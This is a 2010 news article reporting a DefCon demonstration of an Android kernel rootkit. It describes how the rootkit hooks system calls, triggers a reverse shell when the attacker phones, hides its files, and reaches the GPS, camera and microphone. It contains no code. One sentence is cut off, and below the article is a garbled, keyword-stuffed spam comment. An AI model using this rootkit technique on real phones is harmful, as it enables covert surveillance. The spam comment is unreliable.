Linux Vulnerability Allows Access to Smartphone System Hardware

Aug 06, 2010

By Dana Tierney, Senior Editor, Fusion Authority

In the last quarter of 2009, an estimated 485 million people had 3G cell phones. By 2020, that number will reach ten billion. A majority of those users keep their phones with them at all times, particularly executives and information technology workers, Trustwave SpiderLabs researchers Christian Papathanasiou and Nicholas Percoco wrote in a white paper distributed at DefCon. Users also almost universally consider their smartphones more secure than a public computer. But malware can target these devices just like any others, with an added danger — the hardware abstraction that makes them easy to use prevents the user from detecting the infection.

Percoco and Papathanasiou demonstrated at DefCon Saturday that the wildly popular Android, based on the Linux 2.6.x kernel, can be infected with an undetectable rootkit that then has access to system hardware such as the camera, microphone and GPS. The SpiderLabs researchers' exploit required physical access to the phone and a subsequent phone call to trigger it, but another vulnerability demonstrated at DefCon could probably be used to circumvent that inconvenience, they said at a press conference, "using their attack and our payload."

Alternatively, a rootkit conceivably could ship with the phone by government mandate, they added, citing a Blackberry "update" by United Arab Emirates mobile carrier Etisalat, which many considered malware. That update, which allowed lawful intercepts of user information, was written by a US firm, SS8.

The Android uses Linux for I/O with its hardware. The user cannot see below the application layer. Any performance issues will probably be shrugged off as a bug as the user reboots, Percoco said at a press conference.

The SpiderLabs rootkit demonstrated at DefCon can redirect outbound calls by hijacking sys_write and modifying the buffer. It also can get access to the GPS at /dev/smd27. The researchers believe that other smartphones may also use the loadable kernel modules that make this infection possible, but so far have only tested the rootkit on the Android.

How It Works

Most of the Android's functionality lives in the libraries just below the application layer. A SQLite database provides storage for call records and SMS records. But it's the Linux kernel at the next layer down that controls the hardware.

Unlike traditional rootkits, kernel root kits can hide processes from /proc and the ps and lsmod commands will not reveal them. They have "hooks" which register their address as the location of a given function and execute when that function is called.

System calls, used for file, process and network operations, are stored in the sys_call_table. Versions of the Linux kernel above 2.5 no longer export this table, but it can still be found in

Papathanasiou and Percoco had problems recompiling the kernel due to non-matching version magics but resolved them by modifying include/Linux/utsrelease.h. They then wrote a debug loadable kernel module to intercept and map system calls and parsed dmesg to reveal phone commands.

They sent a reverse tcp to the attacker using the phone's 4G or wi-fi. The rootkit hijacks sys_read and parses it for ATT CLCC values. If an entry matches the attacker phone, the rootkit then calls the reverse shell, which uses the call_usermodehelper function to spawn the reverse shell as a child of the kernel event keventd. Hijacking sys_getdents allowed them to hide the reverse shell binary, which otherwise would have been visible in the file system.

This allows the attacker to make calls with the phone, read mail and text messages, retrieve GPS information and conceivably to record events with the camera and microphone.

What Can Be Done?

"Clearly bad, when this is happening then it's game over," commented another researcher who had presented a different mobile vulnerability at DefCon.

The average consumer can't do much to prevent infection, but phone manufacturers could help prevent this type of exploit by requiring developers to use signed modules.

Dana Tierney is the Senior Editor at House of Fusion, where she causes authors to cry over their once-thought perfect articles. They recover, and their articles are better for it. But still, the sound of grown men weeping...

Tracey's Gravatar A lot of students belie?e that there's no v?rizon reverse phone lookupmethod to ensure verizon reverse phone lookupit can be through college without getting sch?ol loans, so just why bother trying N?t Fake 3 reverse phone lookup free with namethe number of hoa delinquencies in the project is verizon reverse phone lookupusually to high.reverse phone lookup reverse phone lookup free with n?meThe stories verizon reverse phone lookupgener?lly entail bl?eding, sore spots, bone tottenham hotspurs and ?erizon reverse phone lookupquery. They’re educated f?? it, so imagine that the suffering and issues involved whenever average folks wear them for verizon ?everse phone lookupthe health of fa?hion. reverse phone lookup cell freeWhenever you’re planning to wear dancing heels in ?ddition to plan to move in them, caus? them to become rigid reverse phone lookup free w?th namesimply put foot as well reverse phone lookup cell freeas ankle won’t reverse phone lookup free with namehave the ability to m?ve around a great deal. You’ll have to work towards finding th?t the particular right he?lthy sinc? th?se shoes have been basi?ally designe? to hurt reverse phone lookup cell freethe feet. You’ll want reverse phone lo?kup cell freeto discover the less of this evils. ??nce healthy is so crucial I’m betting that ?ever?e phone lookupits reverse phone lookup free with nameproblematical verizon reverse phone lookupto discover reverse phone lookup free with nam?th? right fit if you have two somewhat diff?rent sizing feet, and that's very reverse phone lookupcommon. Y?u mmay also add some extra toee foam to make them somewhat more comfortable.
# Posted By Tracey | 18-Dec-13 06:39 PM
Add a Comment
(If you subscribe, any new posts to this thread will be sent to your email address.)
Privacy | FAQ | Site Map | About | Guidelines | Contact | Advertising | What is ColdFusion?
House of Fusion | ColdFusion Jobs | Blog of Fusion | AHP Hosting